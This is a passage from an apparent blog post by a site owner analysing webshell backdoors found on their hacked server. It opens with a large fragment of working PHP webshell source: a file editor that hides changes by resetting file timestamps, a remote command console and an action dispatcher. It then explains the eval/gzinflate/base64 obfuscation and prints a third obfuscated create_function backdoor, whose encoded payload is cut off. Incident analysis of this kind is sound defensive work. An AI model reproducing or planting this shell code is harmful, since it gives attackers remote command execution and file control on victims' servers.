'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; echo '<br><br>'; switch($_POST['p2']) { case 'view': echo '<pre class=ml1>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</pre>'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!<br><script>p3_="";</script>'; @touch($_POST['p1'],$time,$time); } } echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</textarea><input type=submit value=">>"></form>'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000<br>','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} $h[1] .= '<br>'; $h[2] .= "\n"; } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>'; else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); } echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; break; } echo '</div>'; wsoFooter(); } function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true; $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false; if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); echo "d.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='".$GLOBALS['cwd']."';"; } } echo "d.cf.output.value+='".$temp."';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } wsoHeader(); echo "<script> if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(''); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur < cmds.length) document.cf.cmd.value = cmds[cur]; else cur--; } } function add(cmd) { cmds.pop(); cmds.push(cmd); cmds.push(''); cur = cmds.length-1; } </script>"; echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; foreach($GLOBALS['aliases'] as $n => $v) { if($v == '') { echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; continue; } echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; if(!empty($_POST['p1'])) { echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1'])); } echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; echo '</form></div><script>d.cf.cmd.focus();</script>'; wsoFooter(); } function actionLogout() { session_destroy(); die('bye!'); } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'SecInfo'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); exit; ?>

What Are We Dealing with Here?

I want to take a moment to discuss decrypting these files and what they do.  If you're primarily interested in fixing your system and taking remedial action, skip down to And How Do We Deal with It? below.

So, it turns out these two files are functionally the same – but then why do they look so different? The first is obfuscated in a combination of binary and base64 encoding, and gzdeflate() data compression. If you were to replace the preg_replace() function with print, then remove the first, and third argument, and everything between the single-quotes of the second argument, you'd get this expression:

print("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x29\x29\x29\x3B");

which when print()'ed to the browser displays:

eval(gzinflate(base64_decode('')));

The second webshell script is not at all encrypted; it is, however, cutely disguised by comments to pass as friendly code written for RSS management. It takes a low hacker indeed to besmirch the honorable name of Kellan Elliot-McCrea.

Verifying that the two scripts are the same thing is easy enough. Do this by commenting out that first line (" $auth_pass = etc. . ." ), which is the key for a password-wrapper around the shell. Remove the password requirement, fire up the script in your browser and -- voila! -- the whole domain tree will now do your bidding. Oh, and how do I know I got hacked by the same person multiple times? Because they keep using the same password!

The third backdoor door stop was the most challenging for me to figure out. It looks like this:

<?php $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7b("",$_8b7b1f("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7MjM0OzI1NTsyMjQ7MjUzOzI1MTsyMzA7MjI1OzIzMjsxNjc7MjAyOzIwODsyMDI7MjIxOzIyMTsxOTI7MjIxOzE3NTsyNDM7MTc1OzIwMjsyMDg7MjE2OzIwNjsyMjE7MTkzOzE5ODsxOTM7MjAwOzE3NTsyNDM7MTc1OzIwMjsyMDg7MjIzOzIwNjsyMjE7MjIwOzIwMjsxNjY7MTgwOzEzMDsxMzM7MjMwOzIyNTsyMzA7MjA4OzI1MjsyMzQ7MjUxOzE2NzsxNjg7MjM1OzIzMDsyNTI7MjU1OzIyNzsyMzg7MjQ2OzIwODsyMzQ7MjUzOzI1MzsyMjQ7MjUzOzI1MjsxNjg7MTYzOzE3NTsxNzM7MTkxOzE3MzsxNjY7MTgwOzEzMDsxMzM7MTMwOzEzMzsyMzA7MjMzOzE3NTsxNjc7MTcxOzIwODsyMjM7MTkyOzIyMDsyMTk7MjEyOzE3MzsyNTU7MTczOzIxMDsxNzU7MTc0OzE3ODsxNzU7MTczOzE3MzsxNjY7MTc1OzI0NDsxMzA7MTMzOzEzNDsxNzE7MjA4OzIwNDsxOTI7MTkyOzE5NjsxOTg7MjAyOzIxMjsxNzM7MjU1OzE3MzsyMTA7MTc1OzE3ODsxNzU7MTcxOzIwODsyMjM7MTkyOzIyMDsyMTk7MjEyOzE3MzsyNTU7MTczOzIxMDsxODA7MTMwOzEzMzsxMzQ7MjUyOzIzNDsyNTE7MjM2OzIyNDsyMjQ7MjI4OzIzMDsyMzQ7MTY3OzE3MzsyNTU7MTczOzE2MzsxNzU7MTcxOzIwODsyMjM7MTkyOzIyMDsyMTk7MjEyOzE3MzsyNTU7MTczOzIxMDsxNjM7MTc1OzI1MTsyMzA7MjI2OzIzNDsxNjc7MTY2OzE3NTsxNjQ7MTc1OzE4ODsxODU7MTkxOzE5MTsxNjY7MTgwOzEzMDsxMzM7MjQyOzEzMDsxMzM7MTMwOzEzMzsyMzA7MjMzOzE3NTsxNjc7MjI2OzIzNTsxODY7MTY3OzE3MTsyMDg7MjA0OzE5MjsxOTI7MTk2OzE5ODsyMDI7MjEyOzE3MzsyNTU7MTczOzIxMDsxNjY7MTc1OzE3NDsxNzg7MTc1OzE3MzsyMzY7MjM4OzE4ODsyMzM7MTg0OzE5MDsxODQ7MjM4OzE4NjsyMzQ7MTg2OzE4ODsyMzM7MTg3OzIzNjsyMzQ7MTg3OzE4NDsyMzc7MTgyOzE5MTsxODU7MTg5OzIzNjsyMzM7MjM3OzIzMzsyMzc7MTg5OzE4NzsxODY7MTgzOzE3MzsxNjY7MTc1OzI0NDsxMzA7MTMzOzEzNDsyMzQ7MjM2OzIzMTsyMjQ7MTc1OzE3MzsxNzk7MjMzOzIyNDsyNTM7MjI2OzE3NTsyMjY7MjM0OzI1MTsyMzE7MjI0OzIzNTsxNzg7MjU1OzIyNDsyNTI7MjUxOzE3NzsxNzM7MTgwOzEzMDsxMzM7MTM0OzIzNDsyMzY7MjMxOzIyNDsxNzU7MTczOzE3OTsyMzA7MjI1OzI1NTsyNTA7MjUxOzE3NTsyNTE7MjQ2OzI1NTsyMzQ7MTc4OzI1MTsyMzQ7MjQ3OzI1MTsxNzU7MjI1OzIzODsyMjY7MjM0OzE3ODsyNTU7MTc1OzI0OTsyMzg7MjI3OzI1MDsyMzQ7MTc4OzE2ODsxNjg7MTc1OzI1MjsyMzA7MjQ1OzIzNDsxNzg7MTg2OzE5MTsxNzc7MTczOzE4MDsxMzA7MTMzOzEzNDsyMzQ7MjM2OzIzMTsyMjQ7MTc1OzE3MzsxNzk7MjMwOzIyNTsyNTU7MjUwOzI1MTsxNzU7MjUxOzI0NjsyNTU7MjM0OzE3ODsyNTI7MjUwOzIzNzsyMjY7MjMwOzI1MTsxNzU7MjI1OzIzODsyMjY7MjM0OzE3ODsyMDU7MjA4OzIyMDsyMTg7MjA1OzE5NDsxOTg7MjE5OzE3NTsyNDk7MjM4OzIyNzsyNTA7MjM0OzE3ODsxNjg7MjA0OzIzMTsyMzQ7MjM2OzIyODsxNjg7MTc3OzE3MzsxODA7MTMwOzEzMzsxMzQ7MjM0OzIzNjsyMzE7MjI0OzE3NTsxNzM7MTc5OzE2MDsyMzM7MjI0OzI1MzsyMjY7MTc3OzE3MzsxODA7MTMwOzEzMzsxMzQ7MjM0OzI0NzsyMzA7MjUxOzE4MDsxMzA7MTMzOzI0MjsxMzA7MTMzOzEzMDsxMzM7MjMwOzIzMzsxNzU7MTY3OzE3MTsyMDg7MjIzOzE5MjsyMjA7MjE5OzIxMjsxNzM7MjM4OzIzNjsyNTE7MjMwOzIyNDsyMjU7MTczOzIxMDsxNzU7MTc4OzE3ODsxNzU7MTczOzI1MDsyNTU7MjI3OzIyNDsyMzg7MjM1OzE3MzsxNjY7MTc1OzI0NDsxMzA7MTMzOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzE3MTsyMjc7MTc4OzE3MTsyMDg7MjAxOzE5ODsxOTU7MjAyOzIyMDsyMTI7MTczOzIzMzsyMzA7MjI3OzIzNDsyNTU7MjM4OzI1MTsyMzE7MTczOzIxMDsyMTI7MTczOzI1MTsyMjY7MjU1OzIwODsyMjU7MjM4OzIyNjsyMzQ7MTczOzIxMDsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MTcxOzIyNTsyMzQ7MjQ4OzI1NTsyMzg7MjUxOzIzMTsxNzg7MTcxOzIwODsyMjM7MTkyOzIyMDsyMTk7MjEyOzE3MzsyMjU7MjM0OzI0ODsyNTU7MjM4OzI1MTsyMzE7MTczOzIxMDsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjMwOzIzMzsxNzU7MTY3OzE3MTsyMjU7MjM0OzI0ODsyNTU7MjM4OzI1MTsyMzE7MTc0OzE3ODsxNzM7MTczOzE2NjsxNzU7MjI2OzIyNDsyNDk7MjM0OzIwODsyNTA7MjU1OzIyNzsyMjQ7MjM4OzIzNTsyMzQ7MjM1OzIwODsyMzM7MjMwOzIyNzsyMzQ7MTY3OzE3MTsyMjc7MTYzOzE3MTsyMjU7MjM0OzI0ODsyNTU7MjM4OzI1MTsyMzE7MTY2OzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsyMzQ7MjM2OzIzMTsyMjQ7MTc1OzE3MzsyMzU7MjI0OzIyNTsyMzQ7MTczOzE4MDsxMzA7MTMzOzEzMDsxMzM7MjQyOzE3NTsyMzQ7MjI3OzI1MjsyMzQ7MTc1OzIzMDsyMzM7MTc1OzE2NzsxNzE7MjA4OzIyMzsxOTI7MjIwOzIxOTsyMTI7MTczOzIzODsyMzY7MjUxOzIzMDsyMjQ7MjI1OzE3MzsyMTA7MTc1OzE3ODsxNzg7MTc1OzE3MzsyNTI7MjU0OzIyNzsxNzM7MTY2OzE3NTsyNDQ7MTMwOzEzMzsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzE7MjU0OzI1MDsyMzQ7MjUzOzI0NjsxNzU7MTc4OzE3NTsxNzE7MjA4OzIyMzsxOTI7MjIwOzIxOTsyMTI7MTczOzI1NDsyNTA7MjM0OzI1MzsyNDY7MTczOzIxMDsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MTcxOzI1NDsyNTA7MjM0OzI1MzsyNDY7MTc1OzE3ODsxNzU7MjUyOzI1MTsyNTM7MjA4OzI1MzsyMzQ7MjU1OzIyNzsyMzg7MjM2OzIzNDsxNjc7MTczOzIxMTsxNjg7MTczOzE2MzsxNzM7MTY4OzE3MzsxNjM7MTcxOzI1NDsyNTA7MjM0OzI1MzsyNDY7MTY2OzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzE7MjI3OzIyNTsyMjg7MTc1OzE3ODsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjM2OzIyNDsyMjU7MjI1OzIzNDsyMzY7MjUxOzE2NzsxNzE7MjA4OzIyMzsxOTI7MjIwOzIxOTsyMTI7MTczOzI1MjsyMzQ7MjUzOzI0OTsyMzQ7MjUzOzE3MzsyMTA7MTYzOzE3NTsxNzE7MjA4OzIyMzsxOTI7MjIwOzIxOTsyMTI7MTczOzI1MDsyNTI7MjM0OzI1MzsxNzM7MjEwOzE2MzsxNzU7MTcxOzIwODsyMjM7MTkyOzIyMDsyMTk7MjEyOzE3MzsyNTU7MjM4OzI1MjsyNTI7MTczOzIxMDsxNjY7MTc1OzIyNDsyNTM7MTc1OzIzNTsyMzA7MjM0OzE3NTsxNjc7MTY4OzE5MzsyMjQ7MjUxOzE3NTsyMzY7MjI0OzIyNTsyMjU7MjM0OzIzNjsyNTE7MjM0OzIzNTsxNzU7MTgxOzE3NTsxNjg7MTc1OzE2MTsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjM0OzI1MzsyNTM7MjI0OzI1MzsxNjc7MTY2OzE2NjsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjUyOzIzNDsyMjc7MjM0OzIzNjsyNTE7MjA4OzIzNTsyMzc7MTY3OzE3MTsyMDg7MjIzOzE5MjsyMjA7MjE5OzIxMjsxNzM7MjM1OzIzNzsxNzM7MjEwOzE2MzsxNzU7MTcxOzIyNzsyMjU7MjI4OzE2NjsxNzU7MjI0OzI1MzsxNzU7MjM1OzIzMDsyMzQ7MTc1OzE2NzsxNjg7MjAzOzIzNzsxNzU7MjMzOzIzODsyMzA7MjI3OzIzNDsyMzU7MTgxOzE3NTsxNjg7MTc1OzE2MTsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjM0OzI1MzsyNTM7MjI0OzI1MzsxNjc7MTY2OzE2NjsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjU0OzI1MDsyMzQ7MjUzOzI0NjsxNjc7MTcxOzI1NDsyNTA7MjM0OzI1MzsyNDY7MTYzOzE3NTsxNzE7MjI3OzIyNTsyMjg7MTY2OzE3NTsyMjQ7MjUzOzE3NTsyMzU7MjMwOzIzNDsxNzU7MTY3OzE2ODsxOTg7MjI1OzI0OTsyMzg7MjI3OzIzMDsyMzU7MTc1OzI1NDsyNTA7MjM0OzI1MzsyNDY7MTgxOzE3NTsxNjg7MTc1OzE2MTsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjM0OzI1MzsyNTM7MjI0OzI1MzsxNjc7MTY2OzE2NjsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjI2OzI0NjsyNTI7MjU0OzIyNzsyMDg7MjM2OzIyNzsyMjQ7MjUyOzIzNDsxNjc7MTcxOzIyNzsyMjU7MjI4OzE2NjsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjM0OzIzNjsyMzE7MjI0OzE3NTsxNzM7MjM1OzIyNDsyMjU7MjM0OzE3OTsyMzc7MjUzOzE3NzsxNzk7MjU1OzI1MzsyMzQ7MTc3OzE3MTsyNTQ7MjUwOzIzNDsyNTM7MjQ2OzE3OTsxNjA7MjU1OzI1MzsyMzQ7MTc3OzE3MzsxODA7MTMwOzEzMzsxMzA7MTMzOzI0MjsxNzU7MjM0OzIyNzsyNTI7MjM0OzE3NTsyMzA7MjMzOzE3NTsxNjc7MTcxOzIwODsyMjM7MTkyOzIyMDsyMTk7MjEyOzE3MzsyMzg7MjM2OzI1MTsyMzA7MjI0OzIyNTsxNzM7MjEwOzE3NTsxNzg7MTc4OzE3NTsxNzM7MjUzOzI1MDsyMjU7MjU1OzIzMTsyNTU7MTczOzE2NjsxNzU7MjQ0OzEzMDsxMzM7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjM0OzI0OTsyMzg7MjI3OzE2NzsyMzc7MjM4OzI1MjsyMzQ7MTg1OzE4NzsyMDg7MjM1OzIzNDsyMzY7MjI0OzIzNTsyMzQ7MTY3OzE3MTsyMDg7MjIzOzE5MjsyMjA7MjE5OzIxMjsxNzM7MjM2OzIyNjsyMzU7MTczOzIxMDsxNjY7MTY2OzE4MDsxMzA7MTMzOzEzMDsxMzM7MjQyOzE3NTsyMzQ7MjI3OzI1MjsyMzQ7MTc1OzI0NDsxMzA7MTMzOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzE3MTsyMzU7MjMwOzI1MjsyMzg7MjM3OzIyNzsyMzQ7MjMzOzI1MDsyMjU7MjM2OzE3NTsxNzg7MTc1OzIwNzsyMzA7MjI1OzIzMDsyMDg7MjMyOzIzNDsyNTE7MTY3OzE3MzsyMzU7MjMwOzI1MjsyMzg7MjM3OzIyNzsyMzQ7MjA4OzIzMzsyNTA7MjI1OzIzNjsyNTE7MjMwOzIyNDsyMjU7MjUyOzE3MzsxNjY7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzIzMDsyMzM7MTc1OzE2NzsxNzQ7MjM0OzIyNjsyNTU7MjUxOzI0NjsxNjc7MTcxOzIzNTsyMzA7MjUyOzIzODsyMzc7MjI3OzIzNDsyMzM7MjUwOzIyNTsyMzY7MTY2OzE2NjsxNzU7MjQ0OzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzE7MjM1OzIzMDsyNTI7MjM4OzIzNzsyMjc7MjM0OzIzMzsyNTA7MjI1OzIzNjsxNzU7MTc4OzE3NTsyNTI7MjUxOzI1MzsyMDg7MjUzOzIzNDsyNTU7MjI3OzIzODsyMzY7MjM0OzE2NzsxNzM7MTc1OzE3MzsxNjM7MTczOzE3MzsxNjM7MTcxOzIzNTsyMzA7MjUyOzIzODsyMzc7MjI3OzIzNDsyMzM7MjUwOzIyNTsyMzY7MTY2OzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTcxOzIzNTsyMzA7MjUyOzIzODsyMzc7MjI3OzIzNDsyMzM7MjUwOzIyNTsyMzY7MTc1OzE3ODsxNzU7MjM0OzI0NzsyNTU7MjI3OzIyNDsyMzU7MjM0OzE2NzsxNzM7MTYzOzE3MzsxNjM7MTcxOzIzNTsyMzA7MjUyOzIzODsyMzc7MjI3OzIzNDsyMzM7MjUwOzIyNTsyMzY7MTY2OzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsyNDI7MTc1OzIzNDsyMjc7MjUyOzIzNDsxNzU7MTcxOzIzNTsyMzA7MjUyOzIzODsyMzc7MjI3OzIzNDsyMzM7MjUwOzIyNTsyMzY7MTc1OzE3ODsxNzU7MjM4OzI1MzsyNTM7MjM4OzI0NjsxNjc7MTY2OzE4MDsxMzA7MTMzOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzIzMzsyNTA7MjI1OzIzNjsyNTE7MjMwOzIyNDsyMjU7MTc1OzIyNjsyNDY7MjUyOzIzMTsyMzQ7MjI3OzIyNzsyMzQ7MjQ3OzIzNDsyMzY7MTY3OzE3MTsyMzY7MjI2OzIzNTsxNjY7MTc1OzI0NDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MjMyOzIyNzsyMjQ7MjM3OzIzODsyMjc7MTc1OzE3MTsyMzU7MjMwOzI1MjsyMzg7MjM3OzIyNzsyMzQ7MjMzOzI1MDsyMjU7MjM2OzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTcxOzI1MzsyMzQ7MjUyOzI1MDsyMjc7MjUxOzE3NTsxNzg7MTc1OzE3MzsxNzM7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsyMzA7MjMzOzE3NTsxNjc7MTc0OzIzNDsyMjY7MjU1OzI1MTsyNDY7MTY3OzE3MTsyMzY7MjI2OzIzNTsxNjY7MTY2OzE3NTsyNDQ7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsyMzA7MjMzOzE3NTsxNjc7MjMwOzI1MjsyMDg7MjM2OzIzODsyMjc7MjI3OzIzODsyMzc7MjI3OzIzNDsxNjc7MTczOzIzNDsyNDc7MjM0OzIzNjsxNzM7MTY2OzE3NTsyMzg7MjI1OzIzNTsxNzU7MTc0OzIwNzsyMzA7MjI1OzIwODsyMzg7MjUzOzI1MzsyMzg7MjQ2OzE2NzsxNzM7MjM0OzI0NzsyMzQ7MjM2OzE3MzsxNjM7MTcxOzIzNTsyMzA7MjUyOzIzODsyMzc7MjI3OzIzNDsyMzM7MjUwOzIyNTsyMzY7MTY2OzE2NjsxNzU7MjQ0OzIwNzsyMzQ7MjQ3OzIzNDsyMzY7MTY3OzE3MTsyMzY7MjI2OzIzNTsxNjM7MTcxOzI1MzsyMzQ7MjUyOzI1MDsyMjc7MjUxOzE2NjsxODA7MTc1OzE3MTsyNTM7MjM0OzI1MjsyNTA7MjI3OzI1MTsxNzU7MTc4OzE3NTsyMDc7MjI5OzIyNDsyMzA7MjI1OzE2NzsxNzM7MjExOzIyNTsxNzM7MTYzOzE3MTsyNTM7MjM0OzI1MjsyNTA7MjI3OzI1MTsxNjY7MTgwOzI0MjsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzIzNDsyMjc7MjUyOzIzNDsyMzA7MjMzOzE3NTsxNjc7MTY3OzE3MTsyNTM7MjM0OzI1MjsyNTA7MjI3OzI1MTsxNzU7MTc4OzE3NTsyMzk7MTcxOzIzNjsyMjY7MjM1OzIzOTsxNjY7MTc1OzE3NDsxNzg7MTc4OzE3NTsyMDE7MjA2OzE5NTsyMjA7MjAyOzE2NjsxNzU7MjQ0OzI0MjsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzIzNDsyMjc7MjUyOzIzNDsyMzA7MjMzOzE3NTsxNjc7MjMwOzI1MjsyMDg7MjM2OzIzODsyMjc7MjI3OzIzODsyMzc7MjI3OzIzNDsxNjc7MTczOzI1MjsyNDY7MjUyOzI1MTsyMzQ7MjI2OzE3MzsxNjY7MTc1OzIzODsyMjU7MjM1OzE3NTsxNzQ7MjA3OzIzMDsyMjU7MjA4OzIzODsyNTM7MjUzOzIzODsyNDY7MTY3OzE3MzsyNTI7MjQ2OzI1MjsyNTE7MjM0OzIyNjsxNzM7MTYzOzE3MTsyMzU7MjMwOzI1MjsyMzg7MjM3OzIyNzsyMzQ7MjMzOzI1MDsyMjU7MjM2OzE2NjsxNjY7MTc1OzI0NDsxNzE7MjQ5OzE3NTsxNzg7MTc1OzIwNzsyMjQ7MjM3OzIwODsyMzI7MjM0OzI1MTsyMDg7MjM2OzIyNDsyMjU7MjUxOzIzNDsyMjU7MjUxOzI1MjsxNjc7MTY2OzE4MDsxNzU7MjA3OzIyNDsyMzc7MjA4OzIzNjsyMjc7MjM0OzIzODsyMjU7MTY3OzE2NjsxODA7MTc1OzIwNzsyNTI7MjQ2OzI1MjsyNTE7MjM0OzIyNjsxNjc7MTcxOzIzNjsyMjY7MjM1OzE2NjsxODA7MTc1OzE3MTsyNTM7MjM0OzI1MjsyNTA7MjI3OzI1MTsxNzU7MTc4OzE3NTsyMDc7MjI0OzIzNzsyMDg7MjMyOzIzNDsyNTE7MjA4OzIzNjsyMjQ7MjI1OzI1MTsyMzQ7MjI1OzI1MTsyNTI7MTY3OzE2NjsxODA7MTc1OzIwNzsyMjQ7MjM3OzIwODsyMzY7MjI3OzIzNDsyMzg7MjI1OzE2NzsxNjY7MTgwOzE3NTsyMzQ7MjM2OzIzMTsyMjQ7MTc1OzE3MTsyNDk7MTgwOzI0MjsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzIzNDsyMjc7MjUyOzIzNDsyMzA7MjMzOzE3NTsxNjc7MjMwOzI1MjsyMDg7MjM2OzIzODsyMjc7MjI3OzIzODsyMzc7MjI3OzIzNDsxNjc7MTczOzI1NTsyMzg7MjUyOzI1MjsyNTE7MjMxOzI1MzsyNTA7MTczOzE2NjsxNzU7MjM4OzIyNTsyMzU7MTc1OzE3NDsyMDc7MjMwOzIyNTsyMDg7MjM4OzI1MzsyNTM7MjM4OzI0NjsxNjc7MTczOzI1NTsyMzg7MjUyOzI1MjsyNTE7MjMxOzI1MzsyNTA7MTczOzE2MzsxNzE7MjM1OzIzMDsyNTI7MjM4OzIzNzsyMjc7MjM0OzIzMzsyNTA7MjI1OzIzNjsxNjY7MTY2OzE3NTsyNDQ7MTcxOzI0OTsxNzU7MTc4OzE3NTsyMDc7MjI0OzIzNzsyMDg7MjMyOzIzNDsyNTE7MjA4OzIzNjsyM